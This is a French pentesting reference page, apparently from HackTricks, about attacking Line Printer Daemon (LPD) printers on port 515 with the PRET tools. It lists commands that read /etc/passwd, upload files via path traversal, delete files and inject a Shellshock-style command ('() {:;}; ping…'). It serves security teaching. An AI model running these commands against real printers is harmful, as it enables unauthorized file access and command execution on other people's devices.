515 - Pentesting Line Printer Daemon (LPD)

Apprenez le piratage AWS de zéro à héros avec htARTE (Expert en équipe rouge AWS de HackTricks)!

Autres façons de soutenir HackTricks :

Introduction au protocole LPD

Dans les années 1980, le protocole Line Printer Daemon (LPD) a été développé dans Berkeley Unix, qui a ensuite été formalisé à travers le RFC1179. Ce protocole fonctionne sur le port 515/tcp, permettant des interactions via la commande lpr. L'essence de l'impression via LPD implique l'envoi d'un fichier de contrôle (pour spécifier les détails de la tâche et l'utilisateur) ainsi qu'un fichier de données (qui contient les informations d'impression). Alors que le fichier de contrôle permet la sélection de divers formats de fichier pour le fichier de données, la manipulation de ces fichiers est déterminée par l'implémentation LPD spécifique. Une implémentation largement reconnue pour les systèmes de type Unix est LPRng. Notamment, le protocole LPD peut être exploité pour exécuter des tâches d'impression PostScript malveillantes ou PJL.

Outils pour interagir avec les imprimantes LPD

PRET introduit deux outils essentiels, lpdprint et lpdtest, offrant une méthode simple pour interagir avec les imprimantes compatibles LPD. Ces outils permettent une gamme d'actions allant de l'impression de données à la manipulation de fichiers sur l'imprimante, telles que le téléchargement, l'envoi ou la suppression :

# To print a file to an LPD printer
lpdprint.py hostname filename
# To get a file from the printer
lpdtest.py hostname get /etc/passwd
# To upload a file to the printer
lpdtest.py hostname put ../../etc/passwd
# To remove a file from the printer
lpdtest.py hostname rm /some/file/on/printer
# To execute a command injection on the printer
lpdtest.py hostname in '() {:;}; ping -c1 1.2.3.4'
# To send a mail through the printer
lpdtest.py hostname mail lpdtest@mailhost.local

Pour les personnes intéressées à explorer davantage le domaine du piratage d'imprimantes, une ressource complète peut être trouvée ici : Hacking Printers.

Shodan

  • port 515

Apprenez le piratage AWS de zéro à héros avec htARTE (HackTricks AWS Red Team Expert)!

Autres façons de soutenir HackTricks :

Dernière mise à jour